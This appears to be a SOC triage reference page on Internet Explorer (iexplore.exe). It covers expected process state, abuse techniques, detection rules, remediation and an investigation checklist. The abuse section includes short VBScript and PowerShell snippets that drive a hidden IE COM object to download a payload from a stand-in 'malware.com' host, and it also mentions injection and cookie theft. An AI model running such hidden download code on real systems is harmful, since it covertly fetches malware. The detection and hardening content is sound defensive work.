iexplore.exeWEB BROWSERiexplore.exe - Internet Explorer Security Analysis
iexplore.exe is **Microsoft Internet Explorer**, a legacy browser officially retired but still present on Windows systems. IE's **legacy COM interfaces** and **poor security model** make it a **favorite target for malware**. Attackers abuse iexplore.exe for **COM-based downloads**, **process injection**, and leveraging its trusted status to bypass application controls.
Risk Summary
CRITICAL priority for SOC triage. iexplore.exe is deprecated but still exploited. Its presence in modern attack chains usually indicates **malicious activity**. Monitor for unexpected launches, especially from cmd.exe/powershell.exe, and its use for downloading files via COM automation.
Overview
What is iexplore.exe?
iexplore.exe is Microsoft Internet Explorer, a legacy web browser that has been officially retired.
History
- Retirement: June 2022 (Win 10), earlier for Win 11
- Still Present: Exists on Windows for compatibility
- Replaced By: Microsoft Edge
Why Still Relevant
Attacker Value:
- Pre-installed on Windows
- Trusted Microsoft binary
- COM automation capabilities
- Legacy vulnerabilities
Security Significance
- Deprecated Security: No longer receiving full updates
- COM Exploitation: Heavily abused for downloads
- Process Injection Target: Common injection host
- Application Control Bypass: Trusted binary status
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Internet Explorer\iexplore.exe |
| Parent | explorer.exe (rare, legitimate) |
| Instances | Usually 0 (deprecated) |
| User | Logged-in user |
| Network | Should be rare/none |
Modern Reality
In modern environments, iexplore.exe running is unusual and warrants investigation.
⚠️ iexplore.exe activity in 2024+ is suspicious by default
Legacy Process Model
iexplore.exe (frame process)
└── iexplore.exe (tab process, optional)
Common Locations
C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE (Rare)
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent: explorer.exe
User: Logged-in user
Context: Legacy application requirement
SUSPICIOUS (Common)
Path: C:\Temp\iexplore.exe
Parent: cmd.exe, powershell.exe, wscript.exe
User: SYSTEM (unexpected)
Context: No business justification for IE use
Behavior: Downloading files, visiting unknown URLs
Default Assumption
| Context | Assumption | Action |
|---|---|---|
| Server | SUSPICIOUS | Investigate |
| Modern Workstation | SUSPICIOUS | Investigate |
| Legacy App Requirement | Verify | Document exception |
| Automated Launch | MALICIOUS | Contain immediately |
Abuse Techniques
Attack Techniques
Technique #1: COM-Based Download (T1105)
Malicious Download via COM:
' VBScript using IE COM object
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://malware.com/payload.exe"
Do While ie.Busy : WScript.Sleep 100 : Loop
PowerShell Variant:
$ie = New-Object -ComObject InternetExplorer.Application
$ie.Visible = $false
$ie.Navigate("http://malware.com/payload.exe")
Technique #2: Living-off-the-Land
Using IE for C2:
- Trusted binary status
- Legitimate network behavior
- Bypasses application whitelisting
Technique #3: Process Injection Target (T1055)
Malware injects into iexplore.exe because:
- Trusted process
- Expected to have network activity
- Often allowed through firewalls
Technique #4: Browser Pivoting (T1185)
Injecting into IE to:
- Steal session cookies
- Perform actions as user
- Access authenticated web applications
Detection Guidance
Detection Strategies
Priority #1: Any IE Execution (Modern Systems)
Process = "iexplore.exe"
→ ALERT: HIGH - IE deprecated, investigate
PowerShell Check:
Get-Process iexplore -ErrorAction SilentlyContinue | ForEach-Object {
Write-Warning "IE RUNNING - Investigate: PID $($_.Id)"
Get-WmiObject Win32_Process -Filter "ProcessId=$($_.Id)" |
Select-Object ProcessId, ParentProcessId, CommandLine
}
Priority #2: Automated/Script Launch
Process = "iexplore.exe" AND
Parent IN ["cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"]
→ ALERT: CRITICAL - Likely malicious
Priority #3: COM Object Creation
ScriptEngine CREATES "InternetExplorer.Application"
→ ALERT: HIGH - IE COM automation
Priority #4: Hidden Window
Process = "iexplore.exe" AND
WindowVisible = false
→ ALERT: CRITICAL - Hidden IE instance
Remediation Steps
Protection and Remediation
Defense: Disable Internet Explorer
Via DISM:
dism /online /Disable-Feature /FeatureName:Internet-Explorer-Optional-amd64 /NoRestart
Via Group Policy:
Computer Configuration → Administrative Templates →
Windows Components → Internet Explorer →
Disable Internet Explorer 11 as a standalone browser
Defense: Application Control
Block iexplore.exe execution except for documented exceptions.
If Compromise Suspected
- Terminate all iexplore.exe processes
- Identify parent process chain
- Check for downloaded files
- Review IE history/cache
- Scan for persistence mechanisms
- Check for COM object abuse
Investigation Checklist
Investigation Checklist
- Determine business justification for IE usage
- Identify parent process launching IE
- Check if window is visible or hidden
- Review command line arguments
- Examine network connections
- Check IE history and cache
- Look for downloaded files
- Scan for process injection
- Verify no scheduled tasks launching IE